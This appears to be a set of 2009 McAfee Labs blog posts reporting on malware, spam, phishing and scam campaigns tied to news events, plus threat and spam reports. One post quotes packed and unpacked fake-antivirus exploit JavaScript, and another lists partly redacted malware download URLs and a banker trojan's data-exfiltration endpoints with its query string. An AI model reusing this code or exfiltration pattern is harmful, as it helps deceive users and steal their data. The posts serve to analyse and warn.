There were about 20 people from multiple security companies who contributed to the development of the proposal for the standard and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains, IPs will open endless possibilities for improving the security of all Internet users.

For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

But there are huge benefits even in trivial transmitting of the simplest malware prevalence data:

• If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
• If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
• If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

Here is how a portion of the XML with meta-data looks like.

If you are interested - the complete XML schema is available here and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:

Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:

What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

This is a snippet of the exploit being loaded:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

And this is a snippet of an interesting part of the unobfuscated version of the exploit:

{kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
kPromo.alerts.windows.length:"alert_window_0";
kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
(kPromo.document.getDocumentElementByID(e));
kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].


The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

In the latest social-engineering tactic targeting online games players, a new spam campaign attempts to lure users into downloading a Monopoly game–though it’s more like a game of Russian roulette. The email is a seemingly innocuous invite from a random user (your first clue that this is something to avoid!). The message uses a subject line such as “Play Online Together” or “Tom has invited you to play Monopoly.”

If recipients follow the link to monopoly2009.com, they are greeted with a web page that looks fairly well done. It advertises “Monopoly” while giving a brief history of the game and providing some fun facts. It also, of course, encourages users to download the app using several links dispersed throughout the page.

No code is injected on users’ computers just by visiting the web page. They need to download and install monopoly.exe, which the site delivers. The executable file is just the first stage of the process, however. A fairly common tactic deployed by hackers is that the code installed as a result of the download is only the beginning. At this point the Trojan is activated on the victims’ computers, and it links to another computer and downloads the second stage of the malware, the piece that turns machines into a spam-sending zombie touting Canadian Pharmacy products.

To help sell the deception, the folks who created the page include a hit counter to suggest that there are people playing the game online right now. Don’t be fooled. This ruse is merely the number of how many people have visited the page thus far.

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

It is certainly not surprising when scammers use major events such as the upcoming FIFA World Cup 2010 to fuel their scams, but I am surprised at how early they started this time!

In fact, the scammers are taking advantage of two events: the soccer World Cup in South Africa next summer and the 75th anniversary of the first flight of a major airline. Two days ago a coworker forwarded me this mail:

With the first part of the text stolen from a U.K.-based riding holiday website and then adding the usual “Hey, you just won a really cool prize. Just send me all your personal information” spin, this scam is certainly not the most sophisticated we shall see. But to my knowledge it is the first.

So as you anticipate your team’s lifting the trophy next July, be careful what emails you reply to or what links you click on. For links in email, do as I do: Don’t click any of them.

“FREE” is by far the most commonly used term in spam mails. The word free is such a striking term that any layman, without the knowledge of these tricks of the trade, can get into the trap of cloaked mails sent by the spammers.

Here are a couple of the most often used sentences in spam mails:

•  We are letting you try it for FREE, you just pay the shipping costs!
•  FREE Download without limits!
•  Get your Free Trial Now!
•  Take FREE exotic vacations!
•  Get Free trial bottle!

This barrage reminds me of the maxim “appearances can be deceiving.” This adage becomes true in a scenario in which an innocent user falls pray to these eye-catching spam mails and then regrets it later.

Coming back to the main topic of broadcasting for “free,” we are observing a trend wherein spammers abuse social networking websites quite frequently by creating fake accounts to host spam.

The most common trend these days is spammers inserting spoofed URLs associated with social networking and social bookmarking sites such as Blogspot, Yahoo Groups, and Google Groups to host porn, health, replica watches, acai power slim, and many others categories of spam on them. Thus it becomes a big challenge for these social networking sites to moderate any abusive or spammy messages on their networks.

A recent and classic example of how the bad guys (spammers) take advantage of some really cool features provided by these networking websites will leave you amazed. Have a look at the following sample, which will give you a better understanding of these types of spam mails.

“Get your Free Trial Now” is a hyperlink to “google.com/reader/view/user/…” Clicking it will redirect you to the web page, where the spammer has created a fake profile on social networking websites. The actual spam is in the form of an image that is again hyperlinked to the main spam website. Basically the spammers have abused the “sharing items” feature to their advantage and are spreading spam.

The feature-sharing items allows you to share all your reading-list contents with the public.

Why is the spammer using a different approach altogether rather than simply placing the spam URL in the mail?

It’s very easy for anti-spam filters to cut out mails with URLs that have been recently created and are hosting spam. An example to this would be URLs with .cn domains hosting meds spam most of the time.

Due to a seeming inability to filter and remove their content, spammers abuse social networking websites far more than any other free web-hosting site. We advise our customers to be cautious about such mails and refrain from clicking any URLs in them.

We’ll finish with some more typical examples of how spam looks on social networking websites.

Pharmacy

Replica Watches

Acai Power Slim

We generally classify email messages pretending to be from a family member of a (often African) dignitary or from a desperate young woman as scams. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help and using his or her financial backing for a money transfer, the sender says that it would be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty becomes a friend with the victim and suddenly has a terrible money problem.

For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scam, are a primary source of revenue. They also employ lottery and fake price scams.

In Eastern Europe senders remain discreet and hide their wealth. But in some African countries such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 observers web site, I searched the French Skyrock social networking platform and discovered the photos and videos from their exploits. Each crook has his own blog entries and is attached to a gang web page were each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

• les banquiers arabes (the Arab bankers)
• la banque africaine (the African bank)
• les boucantiers de la Cote d’Ivoire (The Ivory Cost boucantiers)
• les plus riches (the richest)
• etc.

Here is one example:

According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

In France, one naive victim recently lost €1 million!

Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

The naive are numerous, and cybercriminals know it. We must remain vigilant.

Twitter, LiveJournal, FaceBook, Youtube, Fotki–what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (taken after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to flee from in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that was able to take down Twitter for several hours and significantly slow down connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests to fetch the pages hosted for this user, who had just a few days ago blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system had also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. On one hand, the attackers spoofed the email address of the blogger, which is hosted on Gmail, as the originator of the spam. As a result, the blogger’s inbox was flooded with out-of-office notifications and vacation bounces automatically sent by mail clients of people who had received this spam. This was likely part of an intimidation campaign designed to send a message to cyxymu about who was the real intended target of the DDoS. In addition, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on the servers of those blogs than would already be caused by the DDoS. 

Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.

URLs that were attacked include:

http://twitter.com/cyxymu
http://www.youtube.com/Cyxymu
http://www.facebook.com/cyxymu
http://cyxymu.livejournal.com
http://cyxymu1.livejournal.com
http://fotki.com/cyxymu

The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

Some of the other areas we cover and discuss:

Cybercrime as a Service
As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

Cybercriminals Target Twitter, Social Networks
Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

To view the McAfee Q2 Threats Report, go here.

Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

In our world of anti-malware, we follow a simple formula, “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing on the web for news, beware. An Internet search, combined with the right keywords on your favorite search engine, is expected to lead you to malware. In our investigation on the following case, it has led us to a malicious website hosted at [removed].report-cnn.com/[removed].

Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been repeatedly used in similar attempts in the past. Using this method, the user is often enticed to an attractive video but must install a new video player program.

The victim clicks on a link that allows downloads and installs an executable program which subsequently installs malware. It usually follows with a pop-up message reporting that the downloaded video player program is corrupted!

The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entice users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user off an external link from Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

This malicious website recognizes the target operating system by checking the User-Agent banner information sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delievered to Mac OS-based web browsers.

The malware downloaded from this site are currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware will be detected as OSX/Puper.a Trojan. In other related cases, we are currently detecting them as Generic FakeAlert.a and Generic FakeAlert.c.

We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

McAfee Avert Labs has received a new variant of the Koobface worm. Unlike the previous variants, this one spreads using Twitter by sending fake tweets.

These fake tweets contain links to a video; some of these videos are named “My home video.” When users click these links they are prompted to install a video codec. However, upon following the instructions it actually downloads a variant of the Koobface worm and installs it.

At McAfee we detect this variant as W32/Koobface.worm.gen.e and W32/Koobface.worm.gen.h. The detection for this variant will be available to the public in today’s release (DAT 5675).

Today McAfee released its July 2009 Spam Report, which reveals the Top 15 spam subject lines by domain, among other highlights. So what was the one subject line that was most popular in six continents this quarter? Viagra.

For the .COM domain, “hi” and “hello” hit the most in-boxes, while Viagra and “Salute, man!” subject lines were the most common in the .UK domain.

Among the other findings in the June Spam Report:

• Cybercriminals try to hide from local authorities by sending their spam to foreign addresses

• Recipients of spam are blocking emails from entire regions of the world–meaning the large quantity of spam being hosted by developing nations may hurt the growing legitimate businesses there that are trying to send valid emails

The current Top 5 spam subject lines for the .COM domain are:

1. Hello
2. Hi
3. RE: DISCOUNT 80% 0FF on Pfizer !
4. Replica Watches
5. Undelivered Mail Returned to Sender

See the Top 15 subject lines for each major domain (.ORG, .UK, .CN, etc.), as well as the rest of McAfee’s July Spam Report here.

The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

As we foresaw, spammers have used the Air France AF447 disaster to catch people’s attention and prompt them to open fake news emails related to this event. Less than two weeks after the crash, the firsts emails started to spread. We’ve seen the following subjects:

• A-330 blackbox record
• Another plane crushed
• Last seconds of plane

When opened, all these emails display advertisements promoting Canadian pharmacy products such as Viagra and Cialis.

Two days ago, we saw several million spam messages with these subjects. Today this number is only half as big.

As usual, these spammers are disrespectful and do not hesitate to use the most shocking events to promote their shady businesses.

I thank my colleague Adam Wosotowsky for his invaluable assistance with this post.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

The Swine Flu pill spam has started and it’s taking a few Hollywood stars names in vain. Nothing out of the ordinary with the sites on the far end yet though I do expect Oseltamivir [AKA Tamiflu] will get some extra exposure once the affiliate pill sites are updated.

Subjects:

First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!

Also we’ve noticed domain name registrations mentioning the word swine are up by about 30 times and you can bet your daughters it’s not all going to be “whitehat” SEO.

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious – and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked – even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

